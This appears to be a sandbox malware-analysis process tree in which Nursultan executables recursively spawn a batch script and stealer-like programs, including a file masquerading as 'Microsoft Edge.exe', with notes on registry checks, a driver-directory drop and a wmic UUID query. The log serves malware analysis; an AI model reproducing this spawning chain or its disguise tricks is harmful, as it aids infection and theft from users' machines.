cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
45⤵
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
46⤵
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
47⤵
PID:2196

C:\Windows\system32\cmd.exe
cmd
47⤵
PID:576

C:\Windows\system32\chcp.com
chcp 65001
46⤵
PID:2412

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
46⤵
- Delays execution with timeout.exe
PID:1636

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
46⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
45⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
45⤵
PID:2856

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
45⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
44⤵
PID:1688

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
45⤵
PID:2400

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
46⤵
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
47⤵
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
48⤵
PID:2524

C:\Windows\system32\cmd.exe
cmd
48⤵
PID:2660

C:\Windows\system32\chcp.com
chcp 65001
47⤵
PID:2744

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
47⤵
PID:1688

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
47⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
46⤵
PID:2760

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
46⤵
PID:776

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
46⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
45⤵
PID:2732

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
46⤵
PID:1828

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
47⤵
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
48⤵
PID:1808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
49⤵
PID:1444

C:\Windows\system32\cmd.exe
cmd
49⤵
PID:928

C:\Windows\system32\chcp.com
chcp 65001
48⤵
PID:2744

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
48⤵
- Delays execution with timeout.exe
PID:1608

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
48⤵
PID:3328

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
47⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
47⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
47⤵
PID:408

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
46⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
47⤵
PID:952

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
48⤵
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
49⤵
PID:2768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
50⤵
PID:1844

C:\Windows\system32\cmd.exe
cmd
50⤵
PID:2372

C:\Windows\system32\chcp.com
chcp 65001
49⤵
PID:2052

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
49⤵
- Delays execution with timeout.exe
PID:1848

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
49⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
48⤵
PID:700

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
48⤵
PID:2732

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
48⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
47⤵
PID:2464

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
48⤵
PID:2828

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
49⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
50⤵
PID:3528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
51⤵
PID:3560

C:\Windows\system32\cmd.exe
cmd
51⤵
PID:3572

C:\Windows\system32\chcp.com
chcp 65001
50⤵
PID:3604

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
50⤵
- Delays execution with timeout.exe
PID:3612

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
50⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
49⤵
- Checks processor information in registry
PID:3420

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
49⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
49⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
48⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
49⤵
PID:3356

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
50⤵
PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
51⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
52⤵
PID:4004

C:\Windows\system32\cmd.exe
cmd
52⤵
PID:4012

C:\Windows\system32\chcp.com
chcp 65001
51⤵
PID:4020

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
51⤵
- Delays execution with timeout.exe
PID:4028

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
51⤵
PID:3708

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
50⤵
PID:3848

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
50⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
50⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
49⤵
PID:3432

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
50⤵
PID:3800

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
51⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
52⤵
PID:2956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
53⤵
PID:408

C:\Windows\system32\cmd.exe
cmd
53⤵
PID:2660

C:\Windows\system32\chcp.com
chcp 65001
52⤵
PID:592

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
52⤵
- Delays execution with timeout.exe
PID:3020

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
52⤵
PID:1132

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
51⤵
PID:2816

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
51⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
51⤵
PID:324

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
50⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
51⤵
PID:4084

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
52⤵
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
53⤵
PID:3816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
54⤵
PID:3784

C:\Windows\system32\cmd.exe
cmd
54⤵
PID:3896

C:\Windows\system32\chcp.com
chcp 65001
53⤵
PID:3852

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
53⤵
- Delays execution with timeout.exe
PID:3988

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
53⤵
PID:3208

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
52⤵
PID:3768

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
52⤵
PID:3752

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
52⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
51⤵
PID:1444

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
52⤵
PID:3936

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
53⤵
PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
54⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
55⤵
PID:2956

C:\Windows\system32\cmd.exe
cmd
55⤵
PID:592

C:\Windows\system32\chcp.com
chcp 65001
54⤵
PID:3156

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
54⤵
- Delays execution with timeout.exe
PID:3172

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
54⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
53⤵
- Checks processor information in registry
PID:3916

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
53⤵
PID:4080

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
53⤵
PID:1688

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
52⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
53⤵
PID:4036

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
54⤵
PID:2760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
55⤵
PID:600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
56⤵
PID:3408

C:\Windows\system32\cmd.exe
cmd
56⤵
PID:3400

C:\Windows\system32\chcp.com
chcp 65001
55⤵
PID:3428

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
55⤵
- Delays execution with timeout.exe
PID:3384

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
55⤵
PID:3792

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
54⤵
PID:2832

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
54⤵
PID:2748

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
54⤵
PID:2556

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
53⤵
PID:4056

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
54⤵
PID:3228

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
55⤵
PID:3352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
56⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
57⤵
PID:3748

C:\Windows\system32\cmd.exe
cmd
57⤵
PID:3768

C:\Windows\system32\chcp.com
chcp 65001
56⤵
PID:3784

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
56⤵
PID:3940

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
56⤵
PID:1132

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
55⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
55⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
55⤵
PID:3676

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
54⤵
PID:3244

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
55⤵
PID:3572

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
56⤵
PID:1808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
57⤵
PID:3788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
58⤵
PID:3360

C:\Windows\system32\cmd.exe
cmd
58⤵
PID:4000

C:\Windows\system32\chcp.com
chcp 65001
57⤵
PID:3780

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
57⤵
- Delays execution with timeout.exe
PID:4044

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
57⤵
PID:3276

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
56⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
56⤵
PID:1372

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
56⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
55⤵
PID:3528

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
56⤵
PID:3736

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
57⤵
PID:944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
58⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
59⤵
PID:3864

C:\Windows\system32\cmd.exe
cmd
59⤵
PID:3140

C:\Windows\system32\chcp.com
chcp 65001
58⤵
PID:3948

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
58⤵
- Delays execution with timeout.exe
PID:3776

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
58⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
57⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
57⤵
PID:3120

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
57⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
56⤵
PID:3568

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
57⤵
PID:3552

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
58⤵
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
59⤵
PID:3428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
60⤵
PID:3540

C:\Windows\system32\cmd.exe
cmd
60⤵
PID:3840

C:\Windows\system32\chcp.com
chcp 65001
59⤵
PID:3368

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
59⤵
- Delays execution with timeout.exe
PID:2372

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
59⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
58⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
58⤵
PID:840

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
58⤵
PID:3312

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
57⤵
PID:3096

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
58⤵
PID:2556

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
59⤵
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
60⤵
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
61⤵
PID:3816

C:\Windows\system32\cmd.exe
cmd
61⤵
PID:2748

C:\Windows\system32\chcp.com
chcp 65001
60⤵
PID:3376

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
60⤵
- Delays execution with timeout.exe
PID:3432

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
60⤵
PID:3580

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
59⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
59⤵
PID:3440

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
59⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
58⤵
PID:1608

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
59⤵
PID:3240

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
60⤵
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
61⤵
PID:3224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
62⤵
PID:3608

C:\Windows\system32\cmd.exe
cmd
62⤵
PID:3356

C:\Windows\system32\chcp.com
chcp 65001
61⤵
PID:3620

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
61⤵
PID:3596

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
61⤵
PID:3536

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
60⤵
- Checks processor information in registry
PID:3172

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
60⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
60⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
59⤵
PID:3244

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
60⤵
PID:3212

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
61⤵
PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
62⤵
PID:3100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
63⤵
PID:3156

C:\Windows\system32\cmd.exe
cmd
63⤵
PID:3996

C:\Windows\system32\chcp.com
chcp 65001
62⤵
PID:3424

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
62⤵
- Delays execution with timeout.exe
PID:3992

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
62⤵
PID:2128

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
61⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
61⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
61⤵
PID:2968

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
60⤵
PID:3524

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
61⤵
PID:3476

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
62⤵
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
63⤵
PID:2724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
64⤵
PID:4072

C:\Windows\system32\cmd.exe
cmd
64⤵
PID:3408

C:\Windows\system32\chcp.com
chcp 65001
63⤵
PID:1792

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
63⤵
- Delays execution with timeout.exe
PID:1540

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
63⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
62⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
62⤵
PID:4004

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
62⤵
PID:3812

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
61⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
62⤵
PID:1500

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
63⤵
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
64⤵
PID:3952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
65⤵
PID:3028

C:\Windows\system32\cmd.exe
cmd
65⤵
PID:1652

C:\Windows\system32\chcp.com
chcp 65001
64⤵
PID:3888

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
64⤵
- Delays execution with timeout.exe
PID:3536

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
64⤵
PID:3156

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
63⤵
PID:3916

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
63⤵
PID:3192

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
63⤵
PID:3320

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
62⤵
PID:3260

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
63⤵
PID:3928

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
64⤵
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
65⤵
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
66⤵
PID:2556

C:\Windows\system32\cmd.exe
cmd
66⤵
PID:3300

C:\Windows\system32\chcp.com
chcp 65001
65⤵
PID:3224

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
65⤵
- Delays execution with timeout.exe
PID:3504

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
65⤵
PID:3208

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
64⤵
- Checks processor information in registry
PID:3176

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
64⤵
PID:3708

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
64⤵
PID:3908

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
63⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
64⤵
PID:948

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
65⤵
PID:3140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
66⤵
PID:3272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
67⤵
PID:3988

C:\Windows\system32\cmd.exe
cmd
67⤵
PID:3860

C:\Windows\system32\chcp.com
chcp 65001
66⤵
PID:3948

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
66⤵
- Delays execution with timeout.exe
PID:3596

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
66⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
65⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
65⤵
PID:3148

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
65⤵
- Drops file in Drivers directory
PID:4024

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
66⤵
PID:3076

C:\Windows\system32\attrib.exe
